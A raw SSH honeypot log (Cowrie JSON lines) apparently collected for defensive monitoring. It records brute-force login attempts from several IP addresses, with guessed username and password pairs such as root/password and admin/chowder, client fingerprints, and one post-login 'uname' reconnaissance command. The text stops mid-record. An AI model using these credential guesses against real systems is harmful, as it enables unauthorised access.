{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":33368,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c8703c197d7","protocol":"ssh","message":"New connection: 45.125.211.194:33368 (1.2.3.4:22) [session: 0c8703c197d7]","sensor":"my-vps","timestamp":"2025-08-28T03:06:40.166930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:06:40.180282Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:06:40.377141Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:06:41.211943Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:06:41.647045Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:06:41.647743Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:41.858030Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:41.859381Z","src_ip":"45.125.211.194","session":"0c8703c197d7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23162,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb769c30cdf1","protocol":"ssh","message":"New connection: 45.125.211.194:23162 (1.2.3.4:22) [session: cb769c30cdf1]","sensor":"my-vps","timestamp":"2025-08-28T03:06:54.923475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:06:54.947357Z","src_ip":"45.125.211.194","session":"cb769c30cdf1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:06:55.134890Z","src_ip":"45.125.211.194","session":"cb769c30cdf1"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:55.970416Z","src_ip":"45.125.211.194","session":"cb769c30cdf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38809,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d0b1c3cd079","protocol":"ssh","message":"New connection: 212.227.125.160:38809 (1.2.3.4:22) [session: 1d0b1c3cd079]","sensor":"my-vps","timestamp":"2025-08-28T03:06:56.374009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:06:56.374821Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:06:56.434558Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chowder","message":"login attempt [admin/chowder] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:56.753666Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:06:57.182110Z","src_ip":"45.125.211.194","session":"cb769c30cdf1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"choppers","message":"login attempt [admin/choppers] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:57.816017Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chango","message":"login attempt [admin/chango] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:58.878942Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.login.failed","username":"admin","password":"catalog","message":"login attempt [admin/catalog] failed","sensor":"my-vps","timestamp":"2025-08-28T03:06:59.940901Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cannonda","message":"login attempt [admin/cannonda] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:01.003381Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:02.064725Z","src_ip":"212.227.125.160","session":"1d0b1c3cd079"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":51152,"dst_ip":"1.2.3.4","dst_port":22,"session":"b87503ecb441","protocol":"ssh","message":"New connection: 194.233.79.134:51152 (1.2.3.4:22) [session: b87503ecb441]","sensor":"my-vps","timestamp":"2025-08-28T03:07:03.261018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:03.674532Z","src_ip":"194.233.79.134","session":"b87503ecb441"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:07:03.675201Z","src_ip":"194.233.79.134","session":"b87503ecb441"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:06.137138Z","src_ip":"194.233.79.134","session":"b87503ecb441"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:07.348562Z","src_ip":"194.233.79.134","session":"b87503ecb441"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40883,"dst_ip":"1.2.3.4","dst_port":22,"session":"30d342655d9c","protocol":"ssh","message":"New connection: 45.125.211.194:40883 (1.2.3.4:22) [session: 30d342655d9c]","sensor":"my-vps","timestamp":"2025-08-28T03:07:09.714985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:09.722303Z","src_ip":"45.125.211.194","session":"30d342655d9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:07:09.930861Z","src_ip":"45.125.211.194","session":"30d342655d9c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:10.755041Z","src_ip":"45.125.211.194","session":"30d342655d9c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:11.964735Z","src_ip":"45.125.211.194","session":"30d342655d9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53432,"dst_ip":"1.2.3.4","dst_port":22,"session":"023caa6f246c","protocol":"ssh","message":"New connection: 212.227.235.229:53432 (1.2.3.4:22) [session: 023caa6f246c]","sensor":"my-vps","timestamp":"2025-08-28T03:07:15.391167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:15.392094Z","src_ip":"212.227.235.229","session":"023caa6f246c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:07:15.499187Z","src_ip":"212.227.235.229","session":"023caa6f246c"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123","message":"login attempt [centos/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:07:15.821699Z","src_ip":"212.227.235.229","session":"023caa6f246c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:16.930764Z","src_ip":"212.227.235.229","session":"023caa6f246c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":31318,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e4aeef20500","protocol":"ssh","message":"New connection: 45.125.211.194:31318 (1.2.3.4:22) [session: 3e4aeef20500]","sensor":"my-vps","timestamp":"2025-08-28T03:07:24.596161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:24.602260Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:07:24.855087Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:07:25.697134Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60512,"dst_ip":"1.2.3.4","dst_port":22,"session":"53fc27fb6483","protocol":"ssh","message":"New connection: 217.72.205.35:60512 (1.2.3.4:22) [session: 53fc27fb6483]","sensor":"my-vps","timestamp":"2025-08-28T03:07:26.028925Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:26.030004Z","src_ip":"217.72.205.35","session":"53fc27fb6483"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:07:26.315696Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:07:26.316450Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:26.537542Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:07:26.538718Z","src_ip":"45.125.211.194","session":"3e4aeef20500"}
{"eventid":"cowrie.session.connect","src_ip":"20.2.203.250","src_port":47554,"dst_ip":"1.2.3.4","dst_port":22,"session":"622489cd9b3c","protocol":"ssh","message":"New connection: 20.2.203.250:47554 (1.2.3.4:22) [session: 622489cd9b3c]","sensor":"my-vps","timestamp":"2025-08-28T03:07:34.350811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:34.351796Z","src_ip":"20.2.203.250","session":"622489cd9b3c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T03:07:34.559364Z","src_ip":"20.2.203.250","session":"622489cd9b3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40084,"dst_ip":"1.2.3.4","dst_port":22,"session":"99e391fa826b","protocol":"ssh","message":"New connection: 212.227.235.229:40084 (1.2.3.4:22) [session: 99e391fa826b]","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.042229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:07:39.042930Z","src_ip":"212.227.235.229","session":"99e391fa826b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 